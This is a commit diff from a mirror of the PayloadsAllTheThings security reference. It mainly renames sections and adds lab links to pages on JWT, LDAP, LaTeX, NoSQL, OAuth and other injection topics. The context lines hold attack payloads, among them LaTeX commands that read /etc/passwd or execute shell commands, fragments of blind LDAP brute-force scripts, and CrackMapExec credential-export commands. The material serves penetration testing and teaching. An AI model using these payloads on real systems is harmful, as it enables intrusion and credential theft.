Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-04 02:20:17 +00:00
Code Issues Projects Releases Packages Wiki Activity

Normalize page header for JWT, LDAP, LaTeX, OAuth, ORM

Browse source
This commit is contained in:
Swissky 2024-11-10 15:28:12 +01:00
parent 2304101657
commit 1a3e605d64
10 changed files with 103 additions and 86 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

12
JSON Web Token/README.md
View file

@ -2,7 +2,8 @@
> JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed.
## Summary
## Summary
- [Tools](#tools)
- [JWT Format](#jwt-format)
@ -23,6 +24,7 @@
- [JWT Claims](#jwt-claims)
- [JWT kid Claim Misuse](#jwt-kid-claim-misuse)
- [JWKS - jku header injection](#jwks---jku-header-injection)
- [Labs](#labs)
- [References](#references)
@ -509,6 +511,14 @@ You should create your own key pair for this attack and host it. It should look
* [PortSwigger - JWT authentication bypass via jwk header injection](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jwk-header-injection)
* [PortSwigger - JWT authentication bypass via jku header injection](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jku-header-injection)
* [PortSwigger - JWT authentication bypass via kid header path traversal](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-kid-header-path-traversal)
* [Root Me - JWT - Introduction](https://www.root-me.org/fr/Challenges/Web-Serveur/JWT-Introduction)
* [Root Me - JWT - Revoked token](https://www.root-me.org/en/Challenges/Web-Server/JWT-Revoked-token)
* [Root Me - JWT - Weak secret](https://www.root-me.org/en/Challenges/Web-Server/JWT-Weak-secret)
* [Root Me - JWT - Unsecure File Signature](https://www.root-me.org/en/Challenges/Web-Server/JWT-Unsecure-File-Signature)
* [Root Me - JWT - Public key](https://www.root-me.org/en/Challenges/Web-Server/JWT-Public-key)
* [Root Me - JWT - Header Injection](https://www.root-me.org/en/Challenges/Web-Server/JWT-Header-Injection)
* [Root Me - JWT - Unsecure Key Handling](https://www.root-me.org/en/Challenges/Web-Server/JWT-Unsecure-Key-Handling)
## References

26
LDAP Injection/README.md
View file

@ -2,9 +2,10 @@
> LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements using a local proxy.
## Summary
* [Exploitation](#exploitation)
* [Methodology](#methodology)
* [Payloads](#payloads)
* [Blind Exploitation](#blind-exploitation)
* [Defaults attributes](#defaults-attributes)
@ -12,8 +13,11 @@
* [Scripts](#scripts)
* [Discover valid LDAP fields](#discover-valid-ldap-fields)
* [Special blind LDAP injection](#special-blind-ldap-injection)
* [Labs](#labs)
* [References](#references)
## Exploitation
## Methodology
Example 1.
@ -78,6 +82,7 @@ We can extract using a bypass login
(&(sn=administrator)(password=MYKE)) : OK
```
## Defaults attributes
Can be used in an injection like `*)(ATTRIBUTE_HERE=*`
@ -94,6 +99,7 @@ givenName
commonName
```
## Exploiting userPassword attribute
`userPassword` attribute is not a string like the `cn` attribute for example but its an OCTET STRING
@ -113,15 +119,12 @@ userPassword:2.5.13.18:=\xx\xx\xx
```python
#!/usr/bin/python3
import requests
import string
fields = []
url = 'https://URL.com/'
f = open('dic', 'r') #Open the worldists of common attributes
f = open('dic', 'r')
world = f.read().split('\n')
f.close()
@ -137,7 +140,6 @@ print(fields)
```python
#!/usr/bin/python3
import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
@ -152,15 +154,14 @@ for i in range(50):
break
```
Exploitation script by [@noraj](https://github.com/noraj)
```ruby
#!/usr/bin/env ruby
require 'net/http'
alphabet = [*'a'..'z', *'A'..'Z', *'0'..'9'] + '_@{}-/()!"$%=^[]:;'.split('')
flag = ''
(0..50).each do |i|
puts("[i] Looking for number #{i}")
alphabet.each do |char|
@ -174,7 +175,12 @@ flag = ''
end
```
By [noraj](https://github.com/noraj)
## Labs
* [Root Me - LDAP injection - Authentication](https://www.root-me.org/en/Challenges/Web-Server/LDAP-injection-Authentication)
* [Root Me - LDAP injection - Blind](https://www.root-me.org/en/Challenges/Web-Server/LDAP-injection-Blind)
## References

26
LaTeX Injection/README.md
View file

@ -1,17 +1,23 @@
# LaTex Injection
# LaTeX Injection
> LaTeX Injection is a type of injection attack where malicious content is injected into LaTeX documents. LaTeX is widely used for document preparation and typesetting, particularly in academia, for producing high-quality scientific and mathematical documents. Due to its powerful scripting capabilities, LaTeX can be exploited by attackers to execute arbitrary commands if proper safeguards are not in place.
## Summary
* [Read File](#read-file)
* [Write File](#write-file)
* [File Manipulation](#file-manipulation)
* [Read File](#read-file)
* [Write File](#write-file)
* [Command Execution](#command-execution)
* [Cross Site Scripting](#cross-site-scripting)
* [References](#references)
## Read File
## File Manipulation
You might need to adjust injection with wrappers as `\[` or `$`.
### Read File
Attackers can read the content of sensitive files on the server.
Read file and interpret the LaTeX code in it:
@ -70,7 +76,7 @@ To bypass a blacklist try to replace one character with it's unicode hex value.
\lstin^^70utlisting{/etc/passwd}
```
## Write File
### Write File
Write single lined file:
@ -83,6 +89,7 @@ Write single lined file:
\closeout\outfile
```
## Command Execution
The output of the command will be redirected to stdout, therefore you need to use a temp file to get it.
@ -104,6 +111,7 @@ If you get any LaTex error, consider using base64 to get the result without bad
\input{|"/bin/hostname"}
```
## Cross Site Scripting
From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
@ -120,6 +128,12 @@ in [mathjax](https://docs.mathjax.org/en/latest/input/tex/extensions/unicode.htm
```
## Labs
* [Root Me - LaTeX - Input](https://www.root-me.org/en/Challenges/App-Script/LaTeX-Input)
* [Root Me - LaTeX - Command execution](https://www.root-me.org/en/Challenges/App-Script/LaTeX-Command-execution)
## References
- [Hacking with LaTeX - Sebastian Neef - March 10, 2016](https://0day.work/hacking-with-latex/)

4
Mass Assignment/README.md
View file

@ -4,12 +4,12 @@
## Summary
* [Exploit](#exploit)
* [Methodology](#methodology)
* [Labs](#labs)
* [References](#references)
## Exploit
## Methodology
Mass assignment vulnerabilities are most common in web applications that use Object-Relational Mapping (ORM) techniques or functions to map user input to object properties, where properties can be updated all at once instead of individually. Many popular web development frameworks such as Ruby on Rails, Django, and Laravel (PHP) offer this functionality.

27
Methodology and Resources/Miscellaneous - Tricks.md
View file

@ -1,27 +0,0 @@
# Miscellaneous & Tricks
All the tricks that couldn't be classified somewhere else.
## Send a message to another user
```powershell
# Windows
PS C:\> msg Swissky /SERVER:CRASHLAB "Stop rebooting the XXXX service !"
PS C:\> msg * /V /W /SERVER:CRASHLAB "Hello all !"
# Linux
$ wall "Stop messing with the XXX service !"
$ wall -n "System will go down for 2 hours maintenance at 13:00 PM" # "-n" only for root
$ who
$ write root pts/2 # press Ctrl+D after typing the message.
```
## CrackMapExec Credential Database
```ps1
cmedb (default) > workspace create test
cmedb (test) > workspace default
cmedb (test) > proto smb
cmedb (test)(smb) > creds
cmedb (test)(smb) > export creds csv /tmp/creds
```

13
NoSQL Injection/README.md
View file

@ -2,10 +2,11 @@
> NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.
## Summary
* [Tools](#tools)
* [Exploit](#exploits)
* [Methodology](#methodology)
* [Authentication Bypass](#authentication-bypass)
* [Extract length information](#extract-length-information)
* [Extract data information](#extract-data-information)
@ -14,8 +15,10 @@
* [POST with urlencoded body](#post-with-urlencoded-body)
* [GET](#get)
* [MongoDB Payloads](#mongodb-payloads)
* [Labs](#references)
* [References](#references)
## Tools
* [codingo/NoSQLmap](https://github.com/codingo/NoSQLMap) - Automated NoSQL database enumeration and web application exploitation tool
@ -23,7 +26,7 @@
* [matrix/Burp-NoSQLiScanner](https://github.com/matrix/Burp-NoSQLiScanner) - This extension provides a way to discover NoSQL injection vulnerabilities.
## Exploit
## Methodology
### Authentication Bypass
@ -214,6 +217,12 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
```
## Labs
* [Root Me - NoSQL injection - Authentication](https://www.root-me.org/en/Challenges/Web-Server/NoSQL-injection-Authentication)
* [Root Me - NoSQL injection - Blind](https://www.root-me.org/en/Challenges/Web-Server/NoSQL-injection-Blind)
## References
- [Burp-NoSQLiScanner - matrix - January 30, 2021](https://github.com/matrix/Burp-NoSQLiScanner/blob/main/src/burp/BurpExtender.java)

24
OAuth Misconfiguration/README.md
View file

@ -1,26 +1,20 @@
# OAuth Misconfiguration
> OAuth is a widely-used authorization framework that allows third-party applications to access user data without exposing user credentials. However, improper configuration and implementation of OAuth can lead to severe security vulnerabilities. This document explores common OAuth misconfigurations, potential attack vectors, and best practices for mitigating these risks.
## Summary
- [Labs](#labs)
- [Stealing OAuth Token via referer](#stealing-oauth-token-via-referer)
- [Grabbing OAuth Token via redirect_uri](#grabbing-oauth-token-via-redirect---uri)
- [Executing XSS via redirect_uri](#executing-xss-via-redirect---uri)
- [OAuth private key disclosure](#oauth-private-key-disclosure)
- [Authorization Code Rule Violation](#authorization-code-rule-violation)
- [Cross-Site Request Forgery](#cross-site-request-forgery)
- [Labs](#labs)
- [References](#references)
## Labs
* [PortSwigger - Authentication bypass via OAuth implicit flow](https://portswigger.net/web-security/oauth/lab-oauth-authentication-bypass-via-oauth-implicit-flow)
* [PortSwigger - Forced OAuth profile linking](https://portswigger.net/web-security/oauth/lab-oauth-forced-oauth-profile-linking)
* [PortSwigger - OAuth account hijacking via redirect_uri](https://portswigger.net/web-security/oauth/lab-oauth-account-hijacking-via-redirect-uri)
* [PortSwigger - Stealing OAuth access tokens via a proxy page](https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-a-proxy-page)
* [PortSwigger - Stealing OAuth access tokens via an open redirect](https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-an-open-redirect)
## Stealing OAuth Token via referer
> Do you have HTML injection but can't get XSS? Are there any OAuth implementations on the site? If so, setup an img tag to your server and see if there's a way to get the victim there (redirect, etc.) after login to steal OAuth tokens via referer - [@abugzlife1](https://twitter.com/abugzlife1/status/1125663944272748544)
@ -66,6 +60,7 @@ Some Android/iOS app can be decompiled and the OAuth Private key can be accessed
## Authorization Code Rule Violation
> The client MUST NOT use the authorization code more than once.
If an authorization code is used more than once, the authorization server MUST deny the request
and SHOULD revoke (when possible) all tokens previously issued based on that authorization code.
@ -77,6 +72,15 @@ Applications that do not check for a valid CSRF token in the OAuth callback are
> The client MUST implement CSRF protection for its redirection URI. This is typically accomplished by requiring any request sent to the redirection URI endpoint to include a value that binds the request to the user-agent's authenticated state. The client SHOULD utilize the "state" request parameter to deliver this value to the authorization server when making an authorization request.
## Labs
* [PortSwigger - Authentication bypass via OAuth implicit flow](https://portswigger.net/web-security/oauth/lab-oauth-authentication-bypass-via-oauth-implicit-flow)
* [PortSwigger - Forced OAuth profile linking](https://portswigger.net/web-security/oauth/lab-oauth-forced-oauth-profile-linking)
* [PortSwigger - OAuth account hijacking via redirect_uri](https://portswigger.net/web-security/oauth/lab-oauth-account-hijacking-via-redirect-uri)
* [PortSwigger - Stealing OAuth access tokens via a proxy page](https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-a-proxy-page)
* [PortSwigger - Stealing OAuth access tokens via an open redirect](https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-an-open-redirect)
## References
- [All your Paypal OAuth tokens belong to me - asanso - November 28, 2016](http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html)

20
ORM Leak/README.md
View file

@ -5,7 +5,6 @@ An ORM leak vulnerability occurs when sensitive information, such as database st
## Summary
* [CVE](#cve)
* [Django (Python)](#django-python)
* [Query filter](#query-filter)
* [Relational Filtering](#relational-filtering)
@ -17,14 +16,8 @@ An ORM leak vulnerability occurs when sensitive information, such as database st
* [One-to-One](#one-to-one-1)
* [Many-to-Many](#many-to-many-1)
* [Ransack (Ruby)](#ransack-ruby)
* [Resources](#resources)
## CVE
* [CVE-2023-47117: Label Studio ORM Leak](https://github.com/HumanSignal/label-studio/security/advisories/GHSA-6hjj-gq77-j4qw)
* [CVE-2023-31133: Ghost CMS ORM Leak](https://github.com/TryGhost/Ghost/security/advisories/GHSA-r97q-ghch-82j9)
* [CVE-2023-30843: Payload CMS ORM Leak](https://github.com/payloadcms/payload/security/advisories/GHSA-35jj-vqcf-f2jf)
* [CVE](#cve)
* [References](#references)
## Django (Python)
@ -233,7 +226,14 @@ Only in Ransack < `4.0.0`.
```
## Resources
## CVE
* [CVE-2023-47117: Label Studio ORM Leak](https://github.com/HumanSignal/label-studio/security/advisories/GHSA-6hjj-gq77-j4qw)
* [CVE-2023-31133: Ghost CMS ORM Leak](https://github.com/TryGhost/Ghost/security/advisories/GHSA-r97q-ghch-82j9)
* [CVE-2023-30843: Payload CMS ORM Leak](https://github.com/payloadcms/payload/security/advisories/GHSA-35jj-vqcf-f2jf)
## References
- [ORM Injection - HackTricks - July 30, 2024](https://book.hacktricks.xyz/pentesting-web/orm-injection)
- [ORM Leak Exploitation Against SQLite - Louis Nyffenegger - July 30, 2024](https://pentesterlab.com/blog/orm-leak-with-sqlite3)

19
Open Redirect/README.md
View file

@ -2,24 +2,19 @@
> Un-validated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Un-validated redirect and forward attacks can also be used to maliciously craft a URL that would pass the applications access control check and then forward the attacker to privileged functions that they would normally not be able to access.
## Summary
* [Labs](#labs)
* [Exploitation](#exploitation)
* [Methodology](#methodology)
* [HTTP Redirection Status Code](#http-redirection-status-code)
* [Fuzzing](#fuzzing)
* [Filter Bypass](#filter-bypass)
* [Common injection parameters](#common-injection-parameters)
* [Labs](#labs)
* [References](#references)
## Labs
* [Root Me - HTTP - Open redirect](https://www.root-me.org/fr/Challenges/Web-Serveur/HTTP-Open-redirect)
* [PortSwigger - DOM-based open redirection](https://portswigger.net/web-security/dom-based/open-redirection/lab-dom-open-redirection)
## Exploitation
## Methodology
An open redirect vulnerability occurs when a web application or server uses unvalidated, user-supplied input to redirect users to other sites. This can allow an attacker to craft a link to the vulnerable site which redirects to a malicious site of their choosing.
@ -191,6 +186,12 @@ http://www.example.com/redirect.php?url=javascript:prompt(1)
```
## Labs
* [Root Me - HTTP - Open redirect](https://www.root-me.org/fr/Challenges/Web-Serveur/HTTP-Open-redirect)
* [PortSwigger - DOM-based open redirection](https://portswigger.net/web-security/dom-based/open-redirection/lab-dom-open-redirection)
## References
- [Host/Split Exploitable Antipatterns in Unicode Normalization - Jonathan Birch - August 3, 2019](https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf)

18
Prototype Pollution/README.md
View file

@ -6,14 +6,14 @@
## Summary
* [Tools](#tools)
* [Labs](#labs)
* [Exploit](#exploit)
* [Methodology](#methodology)
* [Examples](#examples)
* [Manual Testing](#manual-testing)
* [Prototype Pollution via JSON input](#prototype-pollution-via-json-input)
* [Prototype Pollution in URL](#prototype-pollution-in-url)
* [Prototype Pollution Payloads](#prototype-pollution-payloads)
* [Prototype Pollution Gadgets](#prototype-pollution-gadgets)
* [Labs](#labs)
* [References](#references)
@ -27,13 +27,7 @@
* [msrkp/PPScan](https://github.com/msrkp/PPScan) - Client Side Prototype Pollution Scanner
## Labs
* [YesWeHack Dojo - Prototype Pollution](https://dojo-yeswehack.com/XSS/Training/Prototype-Pollution)
* [PortSwigger - Prototype Pollution](https://portswigger.net/web-security/all-labs#prototype-pollution)
## Exploit
## Methodology
In JavaScript, prototypes are what allow objects to inherit features from other objects. If an attacker is able to add or modify properties of `Object.prototype`, they can essentially affect all objects that inherit from that prototype, potentially leading to various kinds of security risks.
@ -174,6 +168,12 @@ A "gadget" in the context of vulnerabilities typically refers to a piece of code
Either create your own gadget using part of the source with [yeswehack/pp-finder](https://github.com/yeswehack/pp-finder), or try to use already discovered gadgets [yuske/server-side-prototype-pollution](https://github.com/yuske/server-side-prototype-pollution) / [BlackFan/client-side-prototype-pollution](https://github.com/BlackFan/client-side-prototype-pollution).
## Labs
* [YesWeHack Dojo - Prototype Pollution](https://dojo-yeswehack.com/XSS/Training/Prototype-Pollution)
* [PortSwigger - Prototype Pollution](https://portswigger.net/web-security/all-labs#prototype-pollution)
## References
- [A Pentester's Guide to Prototype Pollution Attacks - Harsh Bothra - January 2, 2023](https://www.cobalt.io/blog/a-pentesters-guide-to-prototype-pollution-attacks)